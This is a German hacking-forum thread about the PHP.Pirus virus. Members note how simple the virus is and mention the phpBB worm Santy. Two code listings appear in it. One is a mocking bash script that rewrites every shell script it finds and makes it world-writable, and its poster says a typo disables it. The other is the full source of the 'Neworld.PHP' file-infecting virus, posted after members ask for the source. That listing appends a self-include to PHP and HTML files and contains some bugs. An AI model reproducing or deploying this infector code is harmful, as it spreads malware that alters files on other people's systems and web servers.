![[HaBo]](/styles/default/logoklein.png){kind=small}
PHP Pirus
- Themenstarter Dwing
- Beginndatum
http://securityresponse.symantec.com/avcenter/venc/data/php.pirus.html
Hab nicht gewußt daß es sowas gibt.... Tja man lernt nie aus. Anscheinend infiziert der Virus PHP Dateien mit einem zusätzlichen Include-Befehl - das sollte eigentlich leicht zu erkennen sein... Die einfachste Abhilfe wäre es, Schreibrechte von den PHP-Dateien zu entfernen.
*edit*: erstellt wurde er anscheinend von der Black Cat Virii Group, vielleicht hilft das bei deiner Suche
Hab nicht gewußt daß es sowas gibt.... Tja man lernt nie aus. Anscheinend infiziert der Virus PHP Dateien mit einem zusätzlichen Include-Befehl - das sollte eigentlich leicht zu erkennen sein... Die einfachste Abhilfe wäre es, Schreibrechte von den PHP-Dateien zu entfernen.
*edit*: erstellt wurde er anscheinend von der Black Cat Virii Group, vielleicht hilft das bei deiner Suche
Mich würde da mal der Source interessieren.
Gibt ja PN 
Den der Source Interessiert mich schon.
Den der Source Interessiert mich schon.
sieben
1
Bitte nicht angegiftet fuehlen, aber ich wusste eben nicht mehr so richtig ob ich lachen oder weinen soll als ich mir das Advisory durchgelesen hab. Okay, es ist nach Definiton ein Programm das sich Huckepack auf ein anders raufklemmt, man kann es aber auch uebertreiben.
Das Ding macht also nichts weiter als <?php include "virus.php" php> in alle php-datein die es findet zu klemmen. Beeindruckend. Sollte nicht schwer zu bauen sein. PHP bringt doch x tausend functions mit um Dateien/Verzeichnisse zu haendeln ohne sich Sorgen machen zu muessen. Ein bischen Rekursion draufpappen und fertig. Das sollte sich sogar mit diesen "PHP Hacker in 21 Sekunden fuer absolute Vollidioten, worthless CD included"-Buechern lernen lassen.
Wie waere es mit (bash-code, weil ich php noch weniger kann):
( Script absichtlich durch _offensichtlichen_ Tippfehler unbrauchbar gemacht Nicht das es noch jemand als root in die shell hackt und ich schuld bin. Also nicht in die shell tun, nicht als root, nicht als jemand anderes und schon gar nicht wenn du nicht weisst was du tust.)
Ist das nun auch ein boeser Virus und jemand wird sofort ein Advisory rausgeben weil wir jahrelang unix-unsicherheit hatten? Muessen wir jetzt alle unsere Computer aufessen?
Ich meine, man muss es nur allen seinen bekannten schicken und sie bitten es als root auszufuehren und moeglichst nicht in die datei zu gucken.
Gut gelaunt in den Morgen,
aufs symantec advisory wartend.
P.S: Fuer die taegliche Dosis einfach ins daily-cron stopfen. ;-)
Das Ding macht also nichts weiter als <?php include "virus.php" php> in alle php-datein die es findet zu klemmen. Beeindruckend. Sollte nicht schwer zu bauen sein. PHP bringt doch x tausend functions mit um Dateien/Verzeichnisse zu haendeln ohne sich Sorgen machen zu muessen. Ein bischen Rekursion draufpappen und fertig. Das sollte sich sogar mit diesen "PHP Hacker in 21 Sekunden fuer absolute Vollidioten, worthless CD included"-Buechern lernen lassen.
Wie waere es mit (bash-code, weil ich php noch weniger kann):
( Script absichtlich durch _offensichtlichen_ Tippfehler unbrauchbar gemacht Nicht das es noch jemand als root in die shell hackt und ich schuld bin. Also nicht in die shell tun, nicht als root, nicht als jemand anderes und schon gar nicht wenn du nicht weisst was du tust.)
Code:
#!/bin/sh
for f in `find . -type f -exec grep -ql \#\!/bin/sh {} \;`
do
echo "Ich bin ein boeser Virus!" > tmp$$
cat $f >>> tmp$$
mv tmp$$ $f
chmod 777 $f
doneIst das nun auch ein boeser Virus und jemand wird sofort ein Advisory rausgeben weil wir jahrelang unix-unsicherheit hatten? Muessen wir jetzt alle unsere Computer aufessen?
Ich meine, man muss es nur allen seinen bekannten schicken und sie bitten es als root auszufuehren und moeglichst nicht in die datei zu gucken.
Gut gelaunt in den Morgen,
aufs symantec advisory wartend.
P.S: Fuer die taegliche Dosis einfach ins daily-cron stopfen. ;-)
Neworld.PHP ist so ähnlich....
PHP:
<?php
$vir_string = "Neworld.PHP\n";
$virstringm = "Welcome To The New World Of PHP Programming\n";
$virt = $vir_string . $virstringm;
echo $virt;
$all = opendir("C:\\Windows\\");
while ($file = readdir($all))
{
$inf = true;
$exe = false;
if ( ($exe = strstr ($file, '.php')) || ($exe = strstr ($file, '.html')) ||
($exe = strstr ($file, '.htm')) || ($exe = strstr ($file, '.htt')) )
{
if ( is_file($file) && is_writeable($file) )
{
$new = fopen($file, "r");
$look = fread($new, filesize($file));
$yes = strstr ($look, 'neworld.php');
if (!$yes) $inf = false;
}
}
if ( ($inf=false) )
{
$new = fopen($file, "a");
$fputs($new, "<!-- ");
$fputs($new, "Neworld.PHP - ");
$fputs($new, "Made By Xmorpfic, ");
$fputs($new, "www.shadowvx.com/bcvg, ");
$fputs($new, "The Black Cat Virii Group.");
$fputs($new, "--->");
$fputs($new, "<?php ");
$fputs($new, "include(\"");
$fputs($new, __FILE__);
$fputs($new, "\"); ");
$fputs($new, "?>");
return;
}
}
closedir($all);
// Neworld.PHP Virus - Made By Xmorfic, www.shadowvx.com/bcvg, Black Cat Virii Group.
?>
Elderan
0
Hallo,
naja dachte erst das wäre ein Virus der sich per google oder so PHP Scripts sucht und diese versucht zu Infizieren.
Aber ne sowas macht der nicht.
Ist halt nichts anderes als ein Virus der nur an PHP Dateien etwas anhängt, so wie es die Viren mit .exe Dateien gemacht haben.
Und mit php sowas zu machen ist bei entsprechenen Schreibrechten echt einfach.
Was ich viel Intressanter finde, den phpBB Wurm Santy, der versucht die per URL zu infizieren.
http://www.heise.de/security/news/meldung/54623
naja dachte erst das wäre ein Virus der sich per google oder so PHP Scripts sucht und diese versucht zu Infizieren.
Aber ne sowas macht der nicht.
Ist halt nichts anderes als ein Virus der nur an PHP Dateien etwas anhängt, so wie es die Viren mit .exe Dateien gemacht haben.
Und mit php sowas zu machen ist bei entsprechenen Schreibrechten echt einfach.
Was ich viel Intressanter finde, den phpBB Wurm Santy, der versucht die per URL zu infizieren.
http://www.heise.de/security/news/meldung/54623
